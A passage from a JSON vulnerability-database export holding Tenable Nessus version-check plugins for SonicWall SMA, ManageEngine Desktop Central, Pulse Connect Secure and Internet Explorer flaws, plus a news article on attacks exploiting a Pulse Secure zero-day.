script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20016\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sma_100_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sonicwall_sma_web_detect.nbin\");\n script_require_keys(\"installed_sw/SonicWall Secure Mobile Access\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'SonicWall Secure Mobile Access';\nvar port = get_http_port(default:443,embedded:TRUE);\nvar app = vcf::get_app_info(app:app_name, webapp:TRUE, port:port);\n\nif (app['Model'] !~ \"SMA (200|210|400|410|500v)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, port);\n\nvar constraints =\n[\n {'min_version' : '10.0', 'fixed_version' : '10.2.0.5.29', 'fixed_display':'Upgrade to version 10.2.0.5-29sv or later.'}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:34", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0026\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:19:04", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution vulnerability.", "cvss3": {}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:08", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file read vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by requesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "cvss3": {}, "published": "2019-08-16T00:00:00", "type": "nessus", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0006\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0656\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:39", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. (CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:14:06", "description": "This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", 